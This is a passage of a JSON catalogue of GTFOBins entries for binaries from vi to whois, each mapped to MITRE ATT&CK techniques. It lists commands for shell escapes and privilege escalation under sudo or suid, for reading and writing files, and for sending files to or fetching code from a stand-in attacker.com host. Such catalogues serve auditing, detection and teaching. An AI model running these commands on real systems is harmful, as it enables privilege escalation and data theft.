shell'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:2:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh\\ -p | shell'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:2:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh | shell'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:3:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c :terminal /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:3:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':terminal /bin/sh -p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:3:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c :terminal /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vigr:inherit:0:sudo","toolId":"gtfo:vigr","toolName":"vigr","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vigr","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vigr/"]},{"id":"gtfo:vigr:inherit:0:suid","toolId":"gtfo:vigr","toolName":"vigr","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vigr","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vigr/"]},{"id":"gtfo:vim:file-read:0:sudo","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:file-read:0:suid","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:file-read:0:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:0:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:0:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:0:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:1:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:1:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:1:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:2:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:2:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:2:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vipw:inherit:0:sudo","toolId":"gtfo:vipw","toolName":"vipw","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vipw","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vipw/"]},{"id":"gtfo:vipw:inherit:0:suid","toolId":"gtfo:vipw","toolName":"vipw","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vipw","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vipw/"]},{"id":"gtfo:virsh:command:0:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-file.xml <<EOF\n<domain type='kvm'>\n <name>x</name>\n <os>\n <type arch='x86_64'>hvm</type>\n </os>\n <memory unit='KiB'>1</memory>\n <devices>\n <interface type='ethernet'>\n <script path='/path/to/command'/>\n </interface>\n </devices>\n</domain>\nEOF\nvirsh -c qemu:///system create /path/to/temp-file.xml\nvirsh -c qemu:///system destroy x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"]},{"id":"gtfo:virsh:file-write:0:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\n\ncat >/path/to/temp-file.xml <<EOF\n<volume type='file'>\n <name>y</name>\n <key>/path/to/output-dir/output-file</key>\n <source>\n </source>\n <capacity unit='bytes'>5</capacity>\n <allocation unit='bytes'>4096</allocation>\n <physical unit='bytes'>5</physical>\n <target>\n <path>/path/to/output-dir/output-file</path>\n <format type='raw'/>\n <permissions>\n <mode>0600</mode>\n <owner>0</owner>\n <group>0</group>\n </permissions>\n </target>\n</volume>\nEOF\n\nvirsh -c qemu:///system pool-create-as x dir --target /path/to/output-dir/\nvirsh -c qemu:///system vol-create --pool x --file /path/to/temp-file.xml\nvirsh -c qemu:///system vol-upload --pool x /path/to/output-dir/output-file /path/to/temp-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group. If the target directory doesn't exist, `pool-create-as` must be run with the `--build` option. The destination file ownership and permissions can be set in the XML.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"]},{"id":"gtfo:virsh:file-write:0:unprivileged","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\n\ncat >/path/to/temp-file.xml <<EOF\n<volume type='file'>\n <name>y</name>\n <key>/path/to/output-dir/output-file</key>\n <source>\n </source>\n <capacity unit='bytes'>5</capacity>\n <allocation unit='bytes'>4096</allocation>\n <physical unit='bytes'>5</physical>\n <target>\n <path>/path/to/output-dir/output-file</path>\n <format type='raw'/>\n <permissions>\n <mode>0600</mode>\n <owner>0</owner>\n <group>0</group>\n </permissions>\n </target>\n</volume>\nEOF\n\nvirsh -c qemu:///system pool-create-as x dir --target /path/to/output-dir/\nvirsh -c qemu:///system vol-create --pool x --file /path/to/temp-file.xml\nvirsh -c qemu:///system vol-upload --pool x /path/to/output-dir/output-file /path/to/temp-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group. If the target directory doesn't exist, `pool-create-as` must be run with the `--build` option. The destination file ownership and permissions can be set in the XML.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/virsh/"]},{"id":"gtfo:virsh:file-write:1:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"virsh -c qemu:///system pool-create-as x dir --target /path/to/dir/\nvirsh -c qemu:///system vol-download --pool x input-file output-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"]},{"id":"gtfo:virsh:file-write:1:unprivileged","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"virsh -c qemu:///system pool-create-as x dir --target /path/to/dir/\nvirsh -c qemu:///system vol-download --pool x input-file output-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/virsh/"]},{"id":"gtfo:volatility:inherit:0:sudo","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/volatility/"]},{"id":"gtfo:volatility:inherit:0:suid","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/volatility/"]},{"id":"gtfo:volatility:inherit:0:unprivileged","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/volatility/"]},{"id":"gtfo:w3m:file-read:0:sudo","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/w3m/"]},{"id":"gtfo:w3m:file-read:0:suid","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/w3m/"]},{"id":"gtfo:w3m:file-read:0:unprivileged","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/w3m/"]},{"id":"gtfo:wall:file-read:0:sudo","toolId":"gtfo:wall","toolName":"wall","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wall --nobanner /path/to/input-file","description":"The textual file is dumped on the current TTY (neither to `stdout` nor to `stderr`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wall/"]},{"id":"gtfo:watch:shell:0:sudo","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -c 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:watch:shell:0:suid","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -p -c 'reset; exec /bin/sh -p 1>&0 2>&0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:watch:shell:0:unprivileged","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -c 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:watch:shell:1:sudo","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:watch:shell:1:suid","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:watch:shell:1:unprivileged","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:wc:file-read:0:sudo","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wc/"]},{"id":"gtfo:wc:file-read:0:suid","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wc/"]},{"id":"gtfo:wc:file-read:0:unprivileged","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wc/"]},{"id":"gtfo:wg-quick:shell:0:sudo","toolId":"gtfo:wg-quick","toolName":"wg-quick","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file.conf <<EOF\n[Interface]\nPostUp = /bin/sh\nEOF\n\nwg-quick up /path/to/temp-file.conf","description":"Use `wg-quick down /path/to/temp-file.conf` in order to be able to run the shell again.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wg-quick/"]},{"id":"gtfo:wget:download:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:download:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:download:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-read:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-read:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-read:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-write:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-write:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-write:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:shell:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh\\n/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:shell:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh -p\\n/bin/sh -p 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:shell:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh\\n/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:1:sudo","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:1:suid","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:1:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:whiptail:file-read:0:sudo","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whiptail/"]},{"id":"gtfo:whiptail:file-read:0:suid","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whiptail/"]},{"id":"gtfo:whiptail:file-read:0:unprivileged","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whiptail/"]},{"id":"gtfo:whois:download:0:sudo","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:whois:download:0:suid","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege 